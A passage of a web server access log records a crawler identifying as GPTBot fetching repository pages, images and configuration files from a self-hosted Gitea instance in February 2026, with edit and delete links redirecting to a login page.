AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" +[17/Feb/2026:15:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" +[17/Feb/2026:15:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" +[17/Feb/2026:15:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" +[17/Feb/2026:15:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" +[17/Feb/2026:15:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10875] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" +[17/Feb/2026:15:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" +[17/Feb/2026:15:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" +[17/Feb/2026:15:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10746] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:15:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" +[17/Feb/2026:15:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/.gitignore" [Client 74.7.227.38] [Length 12223] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:15:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25008] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10202] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692375] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429964] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508483] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498861] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641819] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699419] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/.gitignore?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" +[17/Feb/2026:15:07:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" +[17/Feb/2026:15:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/.gitignore" +[17/Feb/2026:15:07:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" +[17/Feb/2026:15:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/.gitignore" +[17/Feb/2026:15:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/.gitignore" [Client 74.7.227.38] [Length 12084] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" +[17/Feb/2026:15:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/.gitignore" [Client 74.7.227.38] [Length 10035] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" +[17/Feb/2026:15:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:07:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/.gitignore" +[17/Feb/2026:15:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/.gitignore" +[17/Feb/2026:15:07:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/.gitignore" +[17/Feb/2026:15:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/.gitignore" +[17/Feb/2026:15:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" +[17/Feb/2026:15:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/.gitignore" [Client 74.7.227.38] [Length 1529] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" +[17/Feb/2026:15:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10892] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" +[17/Feb/2026:15:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main" [Client 74.7.227.38] [Length 11644] [Gzip 4.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:15:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main" [Client 74.7.227.38] [Length 9991] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:15:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=mostissues&state=open" [Client 74.7.227.38] [Length 8485] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" +[17/Feb/2026:15:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/nginx.conf" [Client 74.7.227.38] [Length 12081] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" +[17/Feb/2026:15:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/projects.sln" [Client 74.7.227.38] [Length 11914] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:15:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:15:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fDOCKER_GUIDE.md" [Client 74.7.227.38] [Length 37543] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:15:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fREADME.md" [Client 74.7.227.38] [Length 29394] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" +[17/Feb/2026:15:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" +[17/Feb/2026:15:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11621] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" +[17/Feb/2026:15:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" +[17/Feb/2026:15:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49519] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" +[17/Feb/2026:15:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 